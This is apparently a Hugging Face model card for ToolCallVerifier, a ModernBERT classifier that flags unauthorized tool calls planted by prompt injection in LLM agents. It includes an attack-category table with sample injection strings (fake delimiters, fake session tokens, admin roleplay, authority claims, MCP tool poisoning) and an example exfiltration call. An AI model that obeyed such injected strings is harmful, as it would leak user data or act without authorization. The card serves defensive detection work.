---
language:
  - en
license: apache-2.0
library_name: transformers
tags:
  - modernbert
  - security
  - jailbreak-detection
  - prompt-injection
  - token-classification
  - tool-calling
  - llm-safety
  - mcp
datasets:
  - microsoft/llmail-inject-challenge
  - allenai/wildjailbreak
  - hackaprompt/hackaprompt-dataset
  - JailbreakBench/JBB-Behaviors
base_model: answerdotai/ModernBERT-base
pipeline_tag: token-classification
model-index:
  - name: tool-call-verifier
    results:
      - task:
          type: token-classification
          name: Unauthorized Tool Call Detection
        metrics:
          - name: UNAUTHORIZED F1
            type: f1
            value: 0.935
          - name: UNAUTHORIZED Precision
            type: precision
            value: 0.9501
          - name: UNAUTHORIZED Recall
            type: recall
            value: 0.9205
          - name: Accuracy
            type: accuracy
            value: 0.9288
---

# ToolCallVerifier - Unauthorized Tool Call Detection


**Stage 2 of a Two-Stage LLM Agent Defense Pipeline**


## 🎯 What This Model Does

ToolCallVerifier is a ModernBERT-based token classifier that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool call JSON to identify malicious arguments that may have been planted through prompt injection attacks.

| Label | Description |
|-------|-------------|
| AUTHORIZED | Token is part of a legitimate, user-requested action |
| UNAUTHORIZED | Token indicates injected/malicious content: **BLOCK** the call |

## 📊 Performance

| Metric | Value |
|--------|-------|
| UNAUTHORIZED F1 | 93.50% |
| UNAUTHORIZED Precision | 95.01% |
| UNAUTHORIZED Recall | 92.05% |
| Overall Accuracy | 92.88% |

### Confusion Matrix (Token-Level)

```
                    Predicted
                 AUTH      UNAUTH
Actual AUTH      130,708    8,483
       UNAUTH     13,924   161,031
```
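
The headline metrics follow directly from this matrix, treating UNAUTHORIZED as the positive class; a quick sanity check in plain Python, using the counts above:

```python
tp, fp = 161_031, 8_483    # UNAUTH predicted UNAUTH / AUTH predicted UNAUTH
fn, tn = 13_924, 130_708   # UNAUTH predicted AUTH   / AUTH predicted AUTH

precision = tp / (tp + fp)                          # ≈ 0.950
recall = tp / (tp + fn)                             # ≈ 0.920
f1 = 2 * precision * recall / (precision + recall)  # ≈ 0.935
accuracy = (tp + tn) / (tp + tn + fp + fn)          # ≈ 0.929
print(f"P={precision:.4f} R={recall:.4f} F1={f1:.4f} Acc={accuracy:.4f}")
```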

## 🗂️ Training Data

Trained on ~30,000 samples combining real-world attacks and synthetic patterns:

### HuggingFace Datasets

| Dataset | Description | Samples |
|---------|-------------|---------|
| LLMail-Inject | Microsoft email injection benchmark | ~10,000 |
| WildJailbreak | Allen AI adversarial safety dataset | ~8,000 |
| HackAPrompt | EMNLP'23 injection competition | ~5,000 |
| JailbreakBench | Harmful behavior patterns | ~2,000 |
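
The public sources can be pulled for inspection with the `datasets` library (a sketch; some of these repos are gated on the Hub and require accepting their terms first, and split/field names differ per dataset):

```python
from datasets import load_dataset

# Dataset IDs as listed in this card's metadata.
llmail = load_dataset("microsoft/llmail-inject-challenge")
print(llmail)
```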

### Synthetic Attack Generators

| Generator | Description |
|-----------|-------------|
| Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
| Filesystem | File/directory operation attacks |
| Network | Network/API exfiltration attacks |
| Email | Email tool hijacking |
| Financial | Transaction manipulation |
| Code Execution | Code injection attacks |
| Authentication | Access control bypass |
| MCP Attacks | Tool poisoning, shadowing, rug pulls |
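
To illustrate the intent-mismatch pattern, here is a minimal sketch (not the actual generator code, which is not published with this card): a sample pairs a benign user intent with a tool call whose arguments do not serve it, and labels the tool-call span UNAUTHORIZED. The intents, calls, and addresses below are hypothetical templates.

```python
import json
import random

# Hypothetical templates, for illustration only.
INTENTS = ["Summarize my emails", "List the files in my project folder"]
MISMATCHED_CALLS = [
    {"name": "send_email", "arguments": {"to": "attacker@example.com", "body": "inbox dump"}},
    {"name": "delete_file", "arguments": {"path": "/etc/passwd"}},
]

def make_intent_mismatch_sample():
    """Build one (text, spans) pair: characters before the tool call are
    AUTHORIZED; the mismatched tool call is labeled UNAUTHORIZED."""
    intent = random.choice(INTENTS)
    call = json.dumps(random.choice(MISMATCHED_CALLS))
    text = f"[USER] {intent} [TOOL] {call}"
    start = text.index("[TOOL] ") + len("[TOOL] ")
    return text, [(start, len(text), "UNAUTHORIZED")]

print(make_intent_mismatch_sample())
```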

## 🚨 Attack Categories Covered

| Category | Source | Description |
|----------|--------|-------------|
| Delimiter Injection | LLMail | `<<end_context>>`, `>>}}]])` |
| Word Obfuscation | LLMail | Inserting noise words between tokens |
| Fake Sessions | LLMail | `START_USER_SESSION`, `EXECUTE_USERQUERY` |
| Roleplay Injection | WildJailbreak | "You are an admin bot that can..." |
| XML Tag Injection | WildJailbreak | `<execute_action>`, `<tool_call>` |
| Authority Bypass | WildJailbreak | "As administrator, I authorize..." |
| Intent Mismatch | Synthetic | User asks X, tool does Y |
| MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
| MCP Shadowing | Synthetic | Fake authorization context |

## 💻 Usage

```python
from transformers import AutoTokenizer, AutoModelForTokenClassification
import torch

model_name = "rootfs/tool-call-verifier"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForTokenClassification.from_pretrained(model_name)

# Example: Verify a tool call
user_intent = "Summarize my emails"
tool_call = '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}'

# Combine for classification
input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)

with torch.no_grad():
    outputs = model(**inputs)
    predictions = torch.argmax(outputs.logits, dim=-1)

id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
labels = [id2label[p.item()] for p in predictions[0]]

# Check for unauthorized tokens
unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
if unauthorized_tokens:
    print("⚠️ BLOCKED: Unauthorized tool call detected!")
    print(f"   Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
else:
    print("✅ Tool call authorized")
```

## ⚙️ Training Configuration

| Parameter | Value |
|-----------|-------|
| Base Model | answerdotai/ModernBERT-base |
| Max Length | 512 tokens |
| Batch Size | 32 |
| Epochs | 5 |
| Learning Rate | 3e-5 |
| Loss | CrossEntropyLoss (class-weighted) |
| Class Weights | [0.5, 3.0] (AUTHORIZED, UNAUTHORIZED) |
| Attention | SDPA (Flash Attention) |
| Hardware | AMD Instinct MI300X (ROCm) |
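
The class-weighted loss can be reproduced with a small `Trainer` subclass, as in this minimal sketch under the hyperparameters above (the actual training script is not included with this card, and dataset preparation is omitted):

```python
import torch
from transformers import (AutoModelForTokenClassification, Trainer,
                          TrainingArguments)

class WeightedTokenTrainer(Trainer):
    """Token-level cross-entropy with class weights [0.5, 3.0]."""
    def compute_loss(self, model, inputs, return_outputs=False, **kwargs):
        labels = inputs.pop("labels")
        outputs = model(**inputs)
        weights = torch.tensor([0.5, 3.0], device=outputs.logits.device)
        loss = torch.nn.functional.cross_entropy(
            outputs.logits.view(-1, 2), labels.view(-1),
            weight=weights, ignore_index=-100)
        return (loss, outputs) if return_outputs else loss

model = AutoModelForTokenClassification.from_pretrained(
    "answerdotai/ModernBERT-base", num_labels=2, attn_implementation="sdpa")
args = TrainingArguments(output_dir="tool-call-verifier",
                         per_device_train_batch_size=32,
                         num_train_epochs=5, learning_rate=3e-5)
# trainer = WeightedTokenTrainer(model=model, args=args, train_dataset=...)
# trainer.train()
```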

## 🔗 Integration with FunctionCallSentinel

This model is Stage 2 of a two-stage defense pipeline:

```
┌─────────────────┐     ┌──────────────────────┐     ┌─────────────────┐
│   User Prompt   │────▶│ FunctionCallSentinel │────▶│   LLM + Tools   │
│                 │     │      (Stage 1)       │     │                 │
└─────────────────┘     └──────────────────────┘     └────────┬────────┘
                                                              │
                               ┌──────────────────────────────▼──────────────────────────┐
                               │            ToolCallVerifier (This Model)                 │
                               │    Token-level verification before tool execution        │
                               └──────────────────────────────────────────────────────────┘
```

| Scenario | Recommendation |
|----------|----------------|
| General chatbot | Stage 1 only |
| Tool-calling agent (low risk) | Stage 1 only |
| Tool-calling agent (high risk) | Both stages |
| Email/file system access | Both stages |
| Financial transactions | Both stages |
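
End to end, the gate could look like the following sketch. `sentinel_is_malicious` is a placeholder for whatever Stage 1 FunctionCallSentinel interface you deploy (its API is not part of this card), and `flagged_spans` is the helper from the Usage section:

```python
def allow_tool_call(user_prompt: str, tool_call_json: str) -> bool:
    # Stage 1: screen the prompt itself (placeholder for FunctionCallSentinel).
    if sentinel_is_malicious(user_prompt):
        return False
    # Stage 2: token-level verification of the proposed call (this model).
    text = f"[USER] {user_prompt} [TOOL] {tool_call_json}"
    return not flagged_spans(text, tokenizer, model)
```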

## 🎯 Intended Use

### Primary Use Cases

- **LLM Agent Security**: Verify tool calls before execution
- **Prompt Injection Defense**: Detect unauthorized actions from injected prompts
- **API Gateway Protection**: Filter malicious tool calls at the infrastructure level (see the sketch below)
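
For the gateway use case, one way to expose the verifier as a service is shown below. This is a sketch assuming FastAPI (which this card does not prescribe) and reuses the `flagged_spans` helper from the Usage section:

```python
from fastapi import FastAPI, HTTPException
from pydantic import BaseModel

app = FastAPI()

class ToolCallRequest(BaseModel):
    user_intent: str
    tool_call: str  # JSON string of the proposed tool call

@app.post("/verify")
def verify(req: ToolCallRequest):
    text = f"[USER] {req.user_intent} [TOOL] {req.tool_call}"
    spans = flagged_spans(text, tokenizer, model)
    if spans:
        raise HTTPException(status_code=403, detail={"flagged": spans})
    return {"status": "authorized"}
```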

### Out of Scope

- General text classification
- Non-tool-calling scenarios
- Languages other than English

## ⚠️ Limitations

1. **Tool schema dependent**: performs best when the tool schema is included in the input
2. **English only**: not tested on languages other than English
3. **Binary classification**: no "suspicious" intermediate category (by design, for decisiveness)

## 📜 License

Apache 2.0


## 🔗 Links